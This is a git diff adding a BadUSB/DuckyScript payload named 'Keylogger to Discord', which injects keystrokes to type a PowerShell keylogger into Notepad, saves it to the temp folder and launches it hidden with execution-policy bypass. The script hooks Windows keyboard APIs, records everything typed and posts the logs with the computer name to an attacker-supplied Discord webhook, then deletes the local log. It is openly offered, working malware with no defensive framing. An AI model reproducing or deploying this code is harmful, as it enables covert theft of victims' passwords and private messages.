diff --git a/OSINT/Keylogger to Discord.txt b/OSINT/Keylogger to Discord.txt new file mode 100644 index 0000000..d5fe68b --- /dev/null +++ b/OSINT/Keylogger to Discord.txt @@ -0,0 +1,484 @@ +REM Title: Keylogger to Discord +REM Author: @beigeworm +REM Description: Uses Powershell to gather keystroke info and send it via Discord. +REM Target: Windows 10 + +REM *SETUP* +REM replace WEBHOOK_HERE with your discord webhook. +REM set $runtime=1 to desired interval beetween emails (in minutes). Default is 1 minute. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM Open Notepad for script building. +DELAY 1000 +GUI r +DELAY 500 +STRING notepad +ENTER +DELAY 2500 +STRING Do{$whuri = "WEBHOOK_HERE";$RunTime = 1;$TimesRun = 1;$getT = Get-Date;$Subj = "$env:COMPUTERNAME : log Results";$body = "$env:COMPUTERNAME : Results : $strt" +ENTER +STRING $SMTP = "smtp.outlook.com";$Prt = "587";$Creds = new-object Management.Automation.PSCredential $FromTo, ($Pass | ConvertTo-SecureString -AsPlainText -Force) +ENTER +STRING $Attachment = $strt = Get-Date;$end = $strt.addminutes($RunTime);function Start-Key($Path="$env:temp\log.txt"){$sigs = @' +ENTER +STRING [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); +ENTER +STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate); +ENTER +STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType); +ENTER +STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); +ENTER +STRING '@ +ENTER +ENTER +STRING $API = Add-Type -MemberDefinition $sigs -Name 'Win32' -Namespace API -PassThru;$null = New-Item -Path $Path -ItemType File -Force;try{$rnnr = 0;while ($TimesRun -ge $rnnr){ +ENTER +STRING while ($end -ge $getT){Start-Sleep -Milliseconds 30;for($ascii = 9; $ascii -le 254; $ascii++){$state = $API::GetAsyncKeyState($ascii);if($state -eq -32767){$null = [console]::CapsLock +ENTER +STRING $virtualKey = $API::MapVirtualKey($ascii, 3);$kbstate = New-Object Byte[] 256;$checkkbstate = $API::GetKeyboardState($kbstate);$mychar = New-Object -TypeName System.Text.StringBuilder +ENTER +STRING $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0);if($success){[System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)}}} +ENTER +STRING $getT = Get-Date};$msg = Get-Content -Path $Path -Raw; $escmsg = $msg -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} +ENTER +STRING $json = @{"username" = "$env:COMPUTERNAME" +ENTER +STRING "content" = $escmsg} | ConvertTo-Json +ENTER +STRING Start-Sleep 1; Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $json; Start-Sleep 1; $whuri = "." +ENTER +STRING Remove-Item -Path $Path -force}}finally{}}Start-Key}While ($a -le 5) +ENTER +DELAY 1000 + +REM because typing speed can't be adjusted. (Can be avoided by moving the mouse while flipper types) +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE + + +DELAY 10000 +REM save in temp directory. +DELAY 1000 +CTRL-SHIFT s +DELAY 1500 +STRING %temp% +ENTER +STRING txtlog.ps1 +DELAY 500 +TAB +DOWN +DOWN +ENTER +ENTER +DELAY 1000 +ALT F4 + +REM Open Powershell and start logs. +DELAY 1000 +GUI r +DELAY 500 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:temp;sleep 1; ./txtlog.ps1;sleep 5;exit +ENTER +